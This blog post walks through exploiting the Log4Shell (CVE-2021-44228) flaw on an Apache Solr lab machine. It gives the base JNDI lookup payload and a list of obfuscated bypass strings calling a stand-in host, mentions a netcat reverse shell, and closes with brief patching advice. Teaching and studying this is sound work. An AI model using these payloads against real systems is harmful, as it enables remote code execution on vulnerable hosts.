Open in app

Sign in

Write

Sign in

log4j Vulnerability

Raghavendra Hiremath
3 min readJan 20, 2022

Very smart people are often tricked by hackers, by phishing. …

NOTE: CONTENTS INTRODUCED IN THIS LESSION ARE PURLY LEARNING PURPOSE!

Hello everyone, welcome to another security blog which I wanted to discuss and “NOT” theory, it’s pure “PRACTICAL”. Before we begin…..

Hope you all are doing well and taking care of yourself and family. It’s been while that I posted any blog, let’s not waste the time. I will try to keep this blog short and minimize the jargons.

On December 9th 2021, the world was made aware of a new vulnerability identified as CVE-2021–44228, affecting the Java logging package log4j. This vulnerability had a severity score of 10.0 (the most critical) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this log4j version. This attack has been dubbed "Log4Shell".

I have a target machine where vulnerability is already exposed and there is a vulnerable app running on a target VM.

Let’s nmap with -v -p switch to get complete perspective of the port and application information.

I suspect port 8983/tcp port to be unknown and my Apache Solar application is running on that port. Let us verify hitting the ip and port

I clearly noticed that this application has log4j has a logging mechanism.

Log file of Solar which includes entry point as params={} and repeated path as /admin/cores.

Let us now try to hit the URL endpoint adding the path to it.

https://x.x.x.x/solr/admin/cores — we are getting the desired result, where we can supply params

I have enabled the nc listener at port 9999, and we the know the general payload to execute will look like this

${jndi:ldap://ATTACKERCONTROLLEDHOST}

This syntax indicates that the log4j will invoke functionality from “JNDI”, or the “Java Naming and Directory Interface.” Ultimately, this can be used to access external resources, or “references,” which is what is weaponized in this attack.

We can open the netcat listener and perform curl on the target machine to have the backdoor open for you to access the target machine

You can pass the payload through script and have reverse shell enabled for you to access the target machine.

Below are the unlimited bypass strings which can be used to hack the machine.

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.y.z/z}${${env:xxxxx:-j}ndi${env:xxxxx:-:}${env:xxxxx:-l}dap${env:xxxxx:-:}//attackerendpoint.com/}${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}${${::-j}ndi:rmi://attackerendpoint.com/}

Considering potential and severity of the vulnerability, I’m stopping the blog here. We will until the log4j is stable and to mitigate the issue, we need to update log4j to the latest version, libraries, files and method that the file is being exposed to.

Happy New Year! to You and Family! Take care everyone.

Security
Log4j

--

--

Raghavendra Hiremath

Written by Raghavendra Hiremath

17 Followers

WE BELIEVE IN FREE AND OPEN SOURCE. My mission is to constantly learn and share the knowledge I gain so that you can use it to empower you.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams